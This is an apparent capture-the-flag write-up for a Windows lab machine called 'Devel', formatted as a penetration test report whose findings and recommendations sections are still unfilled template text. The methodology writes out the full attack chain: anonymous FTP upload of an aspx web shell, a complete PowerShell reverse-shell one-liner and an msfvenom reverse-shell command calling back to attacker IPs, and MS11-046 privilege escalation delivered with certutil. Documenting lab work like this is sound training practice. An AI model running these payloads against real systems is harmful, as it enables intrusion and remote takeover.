# Penetration Test Report - [Devel]

## Table of Contents
- [1. Executive Summary](#1-executive-summary)
- [2. Scope](#2-scope)
- [3. Methodology](#3-methodology)
- [4. Findings](#4-findings)
   - [4.1. Vulnerabilities](#41-vulnerabilities)
   - [4.2. Exploited Systems](#42-exploited-systems)
   - [4.3. Recommendations](#43-recommendations)
- [5. Appendices](#5-appendices)
   - [5.1. Tools Used](#51-tools-used)
   - [5.2. Screenshots](#52-screenshots)

## 1. Executive Summary
Provide a high-level summary of the penetration test results, including the key findings, risks, and overall assessment.

## 2. Scope
Detail the scope of the penetration test, including the target systems, IP addresses, domains, and any specific limitations or exclusions.

## 3. Methodology
  [Devel Machine](owneddevelproof.png)
### 3.1 Scanning
  The scan initiate with the nmap tool to check wich services are running on the target host.
  >> $ nmap -v -sS -sV -Pn -p 1-1000 devel | tee -a nmap.log
  ```
  PORT   STATE SERVICE VERSION
  21/tcp open  ftp     Microsoft ftpd
  80/tcp open  http    Microsoft IIS httpd 7.5
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  ```
  Then the output show that on the first 1000 ports, 2 services are running:

  21/tcp open  ftp     Microsoft ftpd

  after try to login in the FTP application on 21 port, the application asks for a password but, we don't have it.

  Then, try something at the web service hosted in, but nothing. Back at the start point, using some nse tools found some interesting stuff.

  >> $ nmap -p 21 --script "ftp-*" -v delay
  ```
    PORT   STATE SERVICE VERSION
  21/tcp open  ftp     Microsoft ftpd
  | ftp-syst: 
  |_  SYST: Windows_NT
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | 03-18-17  02:06AM       <DIR>          aspnet_client
  | 09-27-23  05:46PM                 1442 cmd.aspx
  | 03-17-17  05:37PM                  689 iisstart.htm
  | 09-27-23  04:15PM                74173 reverse_shell.exe
  |_03-17-17  05:37PM               184946 welcome.png
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

  ```
### 3.2 Exploiting
  The ftp application allow us to log with anonymous user without password needed. After login, the ftp service points to the web root of the Microsoft IIS service. Then, using weppalizer tool in the browser we found that, the framework used in the web service is the ASP.NET web framework, with this, we used ftp service to upload aspx web-shell from kali native files

  >> $ put cmd.aspx

  ![Web shell aspx](screenshots/dev-webshellaspx.png)

  After this, we used some powershell payload wich raises a reverse shell attack.

  >> powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

  or we can simple create a rev shell with msfvenom and upload it with:

  >> $ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.9 LPORT=4242 -f aspx -o shell.aspx

  then we can curl it and raise the reverse shell.

  >> $ curl http://devel/revshell.aspx 

  and we got the user.

### 3.3 PrivEscal
  For some reason, we couldn't use the winPEAS.bat it seems to be on loop for ever. Then, we have to do it manually and wasn't so hard.
  ![SystemInfo](screenshots/develinfo.png)
  
  As we see, we have some privileges our target OS is a windows 7 6.1.7600 N/A Build 7600 which is a vulnerable one.
  #### Using the exploit MS11-046

  ![Exploit Search](develexploit.png)
   
   The exploit is hosted in [exploit-db](https://www.exploit-db.com/exploits/40564), in the instructions notes we realize that we have to compile it using the min-gw compiler to
   generate the .exe file and use the exploit.

   [Exploit Instructions](screenshots/mingwdevel.png)

   Then, we can use a pre-compiled one at this [repo](https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/MS11-046.exe) and use the certutil to transfer it to our target machine.

   So, we can use certutil to download the file from our local host to our target machine with a local python server.

   >> $ python -m http.server 80
   [Http Server](screenshots/pythonserverdevel.png)

   and download it from our localhost with certutil.

   [Certutil usage](screenshots/certutildevel.png)

   after this we can execute the malicious code and get the root and the machine's flags.

   [root devel](screenshots/rootdevel.png)
   [User flag](screenshots/userdevel.png)
   [Root flag](screenshots/rootflagdevel.png)


## 4. Findings
### 4.1. Vulnerabilities
List and describe the vulnerabilities discovered during the penetration test. Include information such as CVE IDs, severity ratings, and a brief description of each vulnerability.

### 4.2. Exploited Systems
Provide details about the systems that were successfully exploited during the test. Include information on the attack vector, privileges gained, and potential impacts.

### 4.3. Recommendations
Offer recommendations for mitigating the identified vulnerabilities and improving overall security posture. Prioritize recommendations based on the severity and impact of vulnerabilities.

## 5. Appendices
### 5.1. Tools Used
List the tools and software used during the penetration test, including their versions and purposes.

---
